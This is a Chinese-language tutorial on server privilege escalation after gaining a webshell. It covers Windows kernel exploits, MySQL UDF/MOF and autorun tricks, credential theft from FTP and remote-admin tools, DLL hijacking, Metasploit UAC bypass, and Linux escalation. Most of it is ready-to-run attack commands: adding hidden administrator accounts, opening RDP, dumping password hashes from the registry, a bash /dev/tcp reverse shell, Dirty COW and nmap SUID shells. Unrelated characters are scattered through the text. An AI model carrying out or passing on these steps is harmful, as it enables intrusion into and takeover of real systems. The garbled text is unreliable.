提權(quán)方法:
溢出漏洞提權(quán)祸穷、數(shù)據(jù)庫提權(quán)(mysql提權(quán)(udf提權(quán),mof提權(quán)勺三,自啟動提權(quán))雷滚、mssql提權(quán))、第三方軟件提權(quán)(serv-u吗坚、flashFxp祈远、genne6 Ftp、vnc商源、radmin 车份、 zend、dll劫持牡彻、perl扫沼、cacle、pcanyWhre等)
windows提權(quán)(sc提權(quán)庄吼、不帶引號的服務路徑[在文件夾名稱帶空格的文件夾下放一個msf木馬缎除,進行shell反彈]、不安全的服務權(quán)限总寻、)伴找、linux提權(quán)(臟牛提權(quán)、suid提權(quán))
數(shù)據(jù)庫脫庫可以使用工具 通過百度查找Navicat Mysql废菱、Navicat for SQL Server技矮、Navicat for Oracle抖誉、Navicat for PostgreSQL、Navicat for SQLite等衰倦,也可以使用其它工具代替袒炉,如sqlmap、k8等類似工具樊零。
2 提權(quán)
2.1 溢出漏洞提權(quán)
溢出漏洞的全名:緩沖區(qū)溢出漏洞 因為它是在程序執(zhí)行的時候在緩沖區(qū)執(zhí)行的[錯誤代碼]我磁。所以叫緩沖區(qū)溢出漏洞。
cmd.exe執(zhí)行命令時需要讀取和寫入權(quán)限驻襟,且需要授予iuser權(quán)限夺艰。默認只有讀取的權(quán)限。
上傳大馬或者菜刀使用cmd時沉衣,無法成功執(zhí)行命令,
原因可能是運維人員把cmd的權(quán)限進行了調(diào)低郁副。只有管理員有寫入權(quán)限。
如何解決:
使用大馬或菜刀豌习,查看哪些目錄具有寫入權(quán)限(不能找?guī)Э崭竦哪夸?存谎,上傳一個cmd.exe到目錄,并設(shè)置新的終端路徑: setp c:\xxx\cmd.exe 肥隆,這樣就使用新的cmd.exe執(zhí)行命令既荚。
提權(quán)常用的命令有:
whoami ——查看用戶權(quán)限
systeminfo ——查看操作系統(tǒng),補丁情況
ipconfig——查看當前服務器IP ipconfig /all
net user——查看當前用戶情況
netstat ——查看當前網(wǎng)絡(luò)連接情況 netstat –ano /netstat –an | find “ESTABLISHED”
tasklist ——查看當前進程情況 tasklist /svc
taskkill ——結(jié)束進程 taskkill -PID xx
net start ——啟動服務
net stop ——停止服務
net user best 123456 /add 添加用戶名為best栋艳,密碼為123456
net localgroup administrators best /add 將用戶名為best的用戶添加到管理員組
net user best /del 刪除best用戶
快速查找未打補丁的 exp恰聘,可以最安全的減少目標機的未知錯誤,以免影響業(yè)務吸占。 命令行下執(zhí)行檢測未打補丁的命令如下:
systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt
可以去下面的網(wǎng)址去下載對應的exploits:
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/WindowsExploits/Exploits
https://github.com/AusJock/Privilege-Escalation
2003系統(tǒng)比較出名的提權(quán)是巴黎烤肉提權(quán)晴叨、pr提權(quán)(ms-09-012)
2.1.1 pr.exe提權(quán)
Windows Server 2003和windows xp系統(tǒng)能夠使用 pr 提權(quán)。如果目標機打上了 KB952004補丁 的話旬昭,是沒有辦法使用pr進行提權(quán)的篙螟。
1.將pr.exe上傳菌湃。
2.運行pr.exe问拘,并使用命令添加賬戶并添加到管理原組。
pr.exe "net user hack 123 /add" #新建一個hack用戶惧所,密碼為 123
pr.exe "net localgroup administrators hack /add" #將hack用戶加入administrators管理員組
3.就可以用遠程桌面登錄了骤坐,前提是目標主機開啟了3389遠程端口。
也可以使用pr.exe后接工具開啟3389端口下愈。
pr.exe "opents.exe"
2.1.2 巴西烤肉漏洞
churrasco.exe是2003系統(tǒng)一個本地提權(quán)漏洞纽绍,通過此工具可以以SYSTEM權(quán)限執(zhí)行命令,從而可以達到添加用戶的目的势似。
1.上傳churrasco.exe
2.在命令行直接輸入命令拌夏,添加賬號
D:\churrasc.exe "net user"
溢出漏洞防范方法:打補丁僧著。
2.2 數(shù)據(jù)庫提權(quán)
2.2.1 mysql提權(quán)
mysql提權(quán)的前提條件是獲取mysql賬號,密碼障簿。以及是否有遠程訪問權(quán)限盹愚。
1.如何獲取mysql賬號,密碼
方法一:
webshell查看網(wǎng)站配置文件站故。
如:conn皆怕、config、data西篓、sql愈腾、common 、inc等岂津。
方法二:
查看數(shù)據(jù)庫安裝路徑下的mysql文件 安裝目錄為/data/mysql/user.myd和user.myi
方法三:
通過暴力破解得到(hscan虱黄、Bruter、hydra寸爆、腳本木馬)
注意事項:
一礁鲁、基于安全考慮root賬戶一般只能本地訪問,但是在開發(fā)過程中可能需要打開root的遠程訪問權(quán)限赁豆。下面是基本的步驟:
1仅醇、登錄到mysql中,為root進行遠程訪問的授權(quán)魔种,執(zhí)行下面的命令:
mysql> GRANT ALL PRIVILEGES ON *.* TO root@"%" IDENTIFIED BY "root";
mysql> flush privileges;
第一句中"%"表示任何主機都可以遠程登錄到該服務器上訪問析二。
如果要限制只有某臺機器可以訪問,將其換成相應的IP即可节预,
GRANT ALL PRIVILEGES ON *.* TO root@“%" IDENTIFIED BY "root";
第二句表示從mysql數(shù)據(jù)庫的grant表中重新加載權(quán)限數(shù)據(jù)叶摄。因為MySQL把權(quán)限都放在了cache中,所以在做完更改后需要重新加載安拟。
二蛤吓、mysql數(shù)據(jù)庫密碼保存文件
參考:http://blog.sina.com.cn/s/blog_8028ba2f0100rzpt.html
三、菜刀數(shù)據(jù)庫連接糠赦、大馬777.php会傲、其它工具爆破
不推薦腳本,速度慢拙泽。
2.2.1.1 udf提權(quán)
1.可以使用工具mysql綜合利用工具淌山。
需要輸入ip,數(shù)據(jù)庫密碼,以及導入的目錄(如果是手工安裝的mysql:默認目錄是c:\windows\system32\udf.dll;如果是phpstudy集成環(huán)境顾瞻,則需要在安裝目錄下的mysql/lib目錄下創(chuàng)建plugin文件夾泼疑。
目錄是:)
2.執(zhí)行SQL,打開3389端口荷荤,添加用戶等退渗。
添加用戶:
select cmdshell('net user 11 test /add');
打開3389端口:
Create Function open3389 returns string soname 'udf.dll';
select open3389();
3.我們也可以使用上傳moon.php大馬來進行連接移稳。
2.2.1.2 mof提權(quán)
1.可以使用工具,創(chuàng)建賬戶會5分鐘創(chuàng)建一個会油,且刪除會再生秒裕。
2.使用菜刀上傳文件moon.mof,這個文件是創(chuàng)建一個admin賬號。
并執(zhí)行命令:
select load_file('C:\\wmpub\\moon.mof') into dumpfile 'c:/windows/system32/wbem/mof/moon.mof';
2.2.1.3 mysql啟動項提權(quán)
1钞啸、通過mysql數(shù)據(jù)庫命令寫入VBS腳本几蜻;
2、直接通過Webshell的Mysql寫入啟動項体斩;
3梭稚、通過MS12-020、MS15-034重啟服務器絮吵。
C:\php\MySQL-5.1.50\bin>mysql -uroot -proot -h192.168.1.109
mysql>drop database test1;
mysql> create database test1;
mysql> use test1;
mysql> create table a (cmd text);
mysql>insert into a values ("set wshshell=createobject (""wscript.shell"")");
mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user best best /add"",0)");
mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators best /add"",0)");
注意雙引號和括號以及后面的“0”一定要輸入弧烤!我們將用這三條命令來建立一個VBS的腳本程序!
mysql>select * from a;
mysql>select * from a into outfile "c://docume~1//administrator//「開始」菜單//程序//啟動//best.vbs";
最后通過溢出漏洞讓服務器重啟蹬敲,如:MS12-020暇昂、MS15-034
2.2.2 mssql提取
溢出漏洞是針對server 2000,2000之后的版本很少有。目前主要是通過弱口令直接提權(quán)伴嗡。
1.可以使用工具其他工具--sql鏈接--sqltools2.0.
2.2.3 安全防御
1急波、限止數(shù)據(jù)庫遠程連接,給數(shù)據(jù)庫帳戶設(shè)置密碼必須>8位以上并數(shù)字+字母+特殊符號等瘪校。
2澄暮、不要給網(wǎng)站配置root或SA權(quán)限。必須給每個網(wǎng)站獨立分配數(shù)據(jù)庫帳戶并限格控制好權(quán)限阱扬。
3泣懊、及時升級數(shù)據(jù)庫補丁。
4麻惶、安裝Waf進行防御馍刮。
5、購買數(shù)據(jù)庫審計設(shè)備
2.3 第三方提權(quán)
2.3.1 serv-u提權(quán)
存在漏洞的地方:
1.5.04以下版本可用servux.exe進行遠程溢出漏洞窃蹋。
2.權(quán)限配置不當可用svu.exe添加管理員賬號卡啰。添加命令:
** svu.exe -i ip地址 -u 用戶 -p 密碼 -a 路徑**
3.serv-u目錄文件存在修改權(quán)限,直接修改配置文件添加管理用戶脐彩。
4.serv-u目錄文件不存在修改權(quán)限碎乃,可直接通過serv-u默認本地管理員提權(quán)姊扔。
2.3.1.1 安裝配置serv.exe
1.安裝并破解serv.exe惠奸。
雙擊setup.exe(漢化包),路徑選擇serv.exe的安裝路徑恰梢。
破解:
運行patch.exe佛南。
-
打開serv.exe梗掰,并進行配置域。新建域嗅回,ip動態(tài)可不填及穗,一切默認。
新建用戶绵载,創(chuàng)建用戶名埂陆,密碼等等车柠。
給與新建的test賬號系統(tǒng)管理員權(quán)限创译,并且設(shè)置目錄訪問權(quán)限啥酱。
2.3.1.2 提權(quán)
方法一:運行大馬侠畔,使用大馬中的serv-u提取功能進行提權(quán)阻桅,服務端口號為:43958(也可以使用端口掃描查看是否開啟了serv-u.exe)
這個方法是添加了一個隱藏的管理員賬號笋轨。
方法二:
1.創(chuàng)建的用戶信息保存在安裝目錄下的Serv-U\ServUDaemon.ini中穿扳。
在serv-u的客戶端刷新一下怀泊,可以查看添加的test1躯畴。
2.在物理機的cmd.exe上可以訪問ftp,進行添加賬戶民鼓。
在ftp命令行中添加賬號的命令為:
quote site exec net user best666 best /add
quote site exec net localgroup administrators best666 /add
2.3.2 FlashFxp提權(quán)
滲透測試人員只需下載quick.dat、sites.dat蓬抄、stats.dat這三個文件進行本
地替換丰嘉,就可以獲取登錄密碼。
1.安裝flashfxp之后嚷缭,查看站點供嚎,密碼可以使用星號密碼克星軟件進行查看。
2.3.3 Gene6 ftp提權(quán)
2.3.3.1 genne6 安裝
1.安裝fenne6,設(shè)置登錄密碼峭状,并進行漢化克滴。漢化時要把垃圾軟件取消勾選。默認安裝路徑是C:\Program Files\Gene6 FTP Server
語言選擇中文优床。
2.主配置文件是Remote.ini劝赔,其路徑是
C:\Program Files\Gene6 FTP Server\RemoteAdmin\Remote.ini。管理員登錄的ip胆敞、端口和密碼都存儲在這着帽。但Gene
6管理員帳號只充許本地登錄。 只能通過Webshell轉(zhuǎn)發(fā)端口才可以進行遠程連接移层。
2.3.3.2 提權(quán)
1.使用菜刀上傳工具lcx.exe
使用命令
lcx.exe –tran 600 127.0.0.1 8021 進行端口轉(zhuǎn)發(fā)仍翰。
2.在win7系統(tǒng)上也安裝genne6,并新建連接,輸入目標ip和轉(zhuǎn)發(fā)的端口600.
3.對win7電腦上的genne6進行設(shè)置观话,新建域名予借,并選擇偵聽的ip為192.168.60.102
在ftp命令模式下使用quote site 123 可以運行cmd.exe
新建用戶:
設(shè)置用戶的權(quán)限:
4.可以在win2003的系統(tǒng)上看到在win7系統(tǒng)上新添加的用戶test1。
2.3.4 PcanyWhere提權(quán)
使用的端口是5631,5632.
1.該軟件的默認安裝路徑為C:\Program Files\Symantec\pcAnywhere\
*.cif文件默認路徑為C:\DocumentS and Settings\All Users\ApplicationData\Symantec\pcAnywhere\Hosts\
2.使用webshell下載*.cif文件灵迫,使用PCAnyPass.exe破解密碼秦叛。
- 在另一臺電腦上安裝 PcanyWhere軟件,創(chuàng)建連接瀑粥,輸入賬號密碼挣跋。
2.3.5 Vnc提權(quán)
vnc的端口是5900/5800,可以使用端口掃描來判斷是否安裝此軟件狞换。
1.vnc的密碼是保存在
注冊表中避咆,可以在命令行輸入命令cmd /c "regedit /e c:\123.reg"HKEY_LOCAL_MACHINE\software\RealVNC\WinVNC4" ",將信1息保存為123.reg修噪。
可以使用軟件vncx4.exe進行破解牌借。
2.3.6 Radmin提權(quán)
2.3.6.1 Radmin安裝設(shè)置
1.安裝Radmin,將軟件包中的server.exe和和admdll.dll放在vm里面,cmd下運行server.exe /setup 設(shè)置密碼及輸入注冊信息割按。也可以設(shè)置圖標隱藏膨报。
2.在物理機上運行radmin.exe控制虛擬機的設(shè)備。
可以使用以下功能:
2.3.6.2提權(quán)
通過上傳的大馬的功能radmin讀取hash或者是注冊表讀取hash值進而控制虛擬機适荣。
1.大馬讀取出的hash值密碼需要轉(zhuǎn)換一下大小寫现柠,將大寫字母轉(zhuǎn)換成小寫。
2.注冊表讀取需要使用命令:
cmd /c "regedit /e c:\123.reg "HKEY_LOCAL_MACHINE\system\RAdmin\v2.0\Server\Parameters""
3.使用hash做為密碼時需要使用Radmin_Hash.exe軟件弛矛。
2.3.7 Zend 提權(quán)
phpstudy默認集成了zend,其路徑是:安裝目錄\php-5.2.17\ZendOptimizer够吩。
1.通過webshell對原ZendExtensionManager.dll重命名,同時上傳nc.exe(瑞士軍刀)和cmd.exe丈氓。
2.在物理機打開Zend_DLL_Hijacking_for_nc.exe軟件周循,進行配置。通過工具重新生成一個來木馬ZendExtensionManager.dll讓apche重啟加載万俗。
3湾笛、等apache重新加載,如果沒有加載可以手工重啟apache加載
4闰歪、telnet ip 1111登錄目錄服務器
2.3.8 DII劫持提權(quán)
要求:目錄可讀可寫嚎研,目錄下有exe文件。
1.使用工具T00ls Lpk Sethc v4.0.exe生成LPK.dll文件库倘,使用webshell上傳到一個可讀可寫临扮,目錄下有exe文件的目錄。
2.運行目錄下的exe文件教翩,然后重啟電腦杆勇。在登陸頁面先按5次shift建,之后再同時按下ab鍵饱亿,輸入密碼蚜退,就實現(xiàn)了dll劫持闰靴。
2.3.9 Windows空格、服務关霸、漏洞提權(quán)
2.3.10 perl與cacls提權(quán)
1.cacls提權(quán),使用命令:
cacls c:\index.asp /t /e /c /g interactive:f
把index.asp加入interactive組并賦予完全控制權(quán)限(IIS的IUSER_用戶就在這一組中).這樣就可以對index.asp任意編輯杰扫。
Cacls filename [/T] [/E] [/C] [/G usererm] [/R user [...]] [/P usererm [...]] [/D user [...]]
Filename:顯示訪問控制列表(以下簡稱ACL)
/T:更改當前目錄及其所有子目錄中指定文件的ACL
/E:編輯ACL而不替換
/C:在出現(xiàn)拒絕訪問錯誤時繼續(xù)
/G Userer:perm:賦予指定用戶訪問權(quán)限队寇,Perm代表不同級別的訪問權(quán)限,其值可以是R(讀取)章姓、W(寫入)佳遣、C(更改,寫入)凡伊、F(完全控制)等零渐。
/R user:撤銷指定用戶的訪問權(quán)限,注意該參數(shù)僅在與“/E”一起使用時有效系忙。
/P user:perm:替換指定用戶的訪問權(quán)限诵盼,perm的含義同前,但增加了“N(無)”的選項银还。
/D user:拒絕指定用戶的訪問
3 windows提權(quán)
uac:是windows的安全機制风宁。(2003版本沒有)
當前獲得的權(quán)限是存在于管理員組的時候但是并且是administrator這個用戶,此時就可能需要我們進行繞過UAC的操作蛹疯,否則雖然是管理員組但是實際上并沒有管理員所對應的高權(quán)限操作,這個時候就需要bypass uac戒财。
3.1 使用木馬提權(quán)
1.在win7新添加一個用戶,新添加的用戶默認屬于user組捺弦。并切換到新加用戶的模式下饮寞。
2.用kali生成payload.exe并下載下來上傳至win7系統(tǒng)。在win7運行建立會話列吼。
3.使用getuid查看當前權(quán)限幽崩,使用getsystem進行提權(quán)。
這個情況下我們需要bypass uac寞钥。
方法一:
使用use exploit/windows/local/ask這個payload歉铝。設(shè)置信息。
或者使用use exploit/windows/local/bypassuac或者
use exploit/windows/local/bypassuac_injection
方法二:
使用漏洞提權(quán):
使用ms11-080漏洞凑耻。
3.2 不帶引號的服務路徑
參考:https://www.cnblogs.com/persuit/p/5916010.html
windows服務運行時太示,如果有可執(zhí)行文件且有完整路徑,系統(tǒng)會按照字面解釋執(zhí)行香浩。如果路徑?jīng)]有被包括在"(引號)中类缤,操作系統(tǒng)就會找含有空格路徑下的第一個實例。
根據(jù)這個漏洞邻吭,我們可以上傳木馬餐弱,然后漏洞特性造成開機自啟動。(上傳之后需要重啟)。
1.使用命令查找?guī)Э崭竦哪夸洠?/p>
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
如果在cmd.exe下不能運行wmic,是環(huán)境變量沒有進行配置膏蚓。在path變量后添加C:\Windows\System32\wbem就可以
2.將exe文件放在c:根目錄下瓢谢,重啟電腦,看是否開機自啟驮瞧。
3.3 sc 命令提權(quán)(adminstrator----system)
SC 是用于與服務控制管理器和服務進行通信的命令行程序氓扛。提供的功能類似于“控制面板”中“管理工具”項中的“服務”。
主要使用的命令有;
sc Create syscmd binPath= “cmd /K start” type= own type= interact
//創(chuàng)建一個名叫syscmd的新的交互式的cmd服務,/k是啟動后窗口不消失论笔。\c是消失
sc start systcmd //啟動新建cmd服務
3.2 linux提權(quán)
linux內(nèi)核版本由3組數(shù)字組成采郎,
第一個數(shù)字是目前發(fā)布的內(nèi)核主板本,
第二個數(shù)字:偶數(shù)表示穩(wěn)定版本狂魔,奇數(shù)表示開發(fā)中版本蒜埋。
第三個數(shù)字代表錯誤的修補次數(shù)。
查看內(nèi)核版本:uname -a
查看發(fā)行版本:cat /etc/issue
cat /etc/*-release
3.2.1 反彈shell
使用的工具是netcat(nc)最楷,瑞士軍刀整份。
1.在kali上使用nc模塊,開啟監(jiān)聽端口
2.在物理機上連接kali主機籽孙。
nc在目錄tools --提權(quán)工具--nc皂林。
3.2.2 bash直接反彈
Linux中一般默認的shell是bash,它功能幾乎可以涵蓋shell所具有的功能蚯撩,所以一般的shell腳本都會指定它為執(zhí)行路徑础倍。
常用的參數(shù)有:
bash -i :生成一個bash交互環(huán)境。
/dev/tcp/目標ip/端口: /dev/tcp/是Linux中的一個特殊設(shè)備胎挎,打開這個文件就相當于發(fā)出了一個socket調(diào)用沟启,建立一個socket連接,讀寫這個文件就相當于在這個socket連接中傳輸數(shù)據(jù)犹菇。同理德迹,Linux中還存在/dev/udp/。這個命令是讓主機與目標主機建立一個tcp連接揭芍。
&:將聯(lián)合符號前面的內(nèi)容和后面相結(jié)合然后一起重定向給后者胳搞。
0>&1:將標準的輸入與標準的輸出內(nèi)容結(jié)合,然后重定向給后面標準輸出的內(nèi)容称杨。
linux文件描述符:linux shell下有三種標準的文件描述符肌毅,分別如下:
0 - stdin 代表標準輸入,使用<或<<
1 - stdout 代表標準輸出,使用>或>>
2 - stderr 代表標準錯誤輸出,使用2>或2>>
當>&后面接文件時,表示將標準輸出和標準錯誤輸出重定向至文件姑原。
當>&后面接文件描述符時悬而,表示將前面的文件描述符重定向至后面的文件描述符
https://www.cnblogs.com/yyxianren/p/12665816.html
1.在kuli系統(tǒng)輸入命令:
bash -i >& /dev/tcp/物理機ip/端口
2.使用nc.exe軟件,輸入nc.exe -l -p 端口號
3.2.1.臟牛提權(quán)
影響范圍:linux內(nèi)核>=2.6.22
原理:關(guān)鍵函數(shù)使是get_user_pages,Copy_on_Write(cow)锭汛。
get_user_pag內(nèi)核函數(shù)在處理cow的過程中笨奠,產(chǎn)生了競爭造成了cow過程被破壞袭蝗。
復制只讀頁生成了一個帶有寫權(quán)限的新頁。
1.下載POC:https://github.com/FireFart/dirtycow
2.利用gcc編譯dirty.c文件
gcc -pthread dirty.c -o dirty -lcrypt
[圖片上傳中...(image.png-b1e76d-1598536884397-0)]
3.2 suid提權(quán)
SUID(設(shè)置用戶ID)是賦予文件的一種權(quán)限般婆,它會出現(xiàn)在文件擁有者權(quán)限的執(zhí)行位上到腥,具有這種權(quán)限的文件會在其執(zhí)行時,使調(diào)用者(普通用戶)暫時獲得該文件擁有者的權(quán)限蔚袍。
suid提權(quán):
大概意思就是就是有個文件乡范,它有s標志,并且他屬主是root页响,普通用戶運行這個程序就可以暫時有了root的權(quán)限篓足,并且這個程序還得能執(zhí)行命令段誊。
文件權(quán)限查詢:
# ll f1
-rwsr-xr-x. 1 root root 0 Nov 17 20:18 f1
文件屬主的x權(quán)限,用s代替.表示被設(shè)置了SUID
如果屬主位沒有x權(quán)限,會顯示為大寫S,表示有故障(權(quán)限無效)
1.首先在本地查找符合條件的文件闰蚕,有以下三個命令
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
列出來的所有文件都是以root用戶權(quán)限來執(zhí)行的,接下來找到可以提權(quán)的文件
常用的可用于suid提權(quán)的文件
Nmap
Vim
find
Bash
More
Less
Nano
cp
namp(2.02-5.21)有交互模式连舍,可以允許執(zhí)行shell命令没陡。
如果支持交互的話,可以使用下命令進入namp交互模式
nmap --interactive
執(zhí)行命令后會返回一個shell
nmap> !sh
sh-3.2# whoami
root
3.3 使用已對外公開的exp
已對外公開 exp 注:
https://github.com/SecWiki/linux-kernel-exploits https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/ https://github.com/xairy/kernel-exploits
3.4 linux常用命令
1.內(nèi)核索赏,操作系統(tǒng)和設(shè)備信息
uname -a 打印所有可用的系統(tǒng)信息
uname -r 內(nèi)核版本
uname -n 系統(tǒng)主機名盼玄。
uname -m 查看系統(tǒng)內(nèi)核架構(gòu)(64位/32位)
hostname 系統(tǒng)主機名
cat /proc/version 內(nèi)核信息
cat /etc/*-release 分發(fā)信息
cat /etc/issue 分發(fā)信息
cat /proc/cpuinfo CPU信息
2.用戶和權(quán)限信息:
whoami 當前用戶名
id 當前用戶信息
cat /etc/sudoers 誰被允許以root身份執(zhí)行
sudo -l 當前用戶可以以root身份執(zhí)行操作
3.linux一句話添加賬號
(1)chpasswd 方法
# useradd guest;echo 'guest:123456'|chpasswd
(2)useradd -p 方法
# useradd -p `openssl passwd 123456` guest
(3)echo -e 方法
# useradd test;echo -e "123456n123456n" |passwd test
(6)其它
Linux運維最常用150個命令](http://www.reibang.com/p/979d8f5e5e65)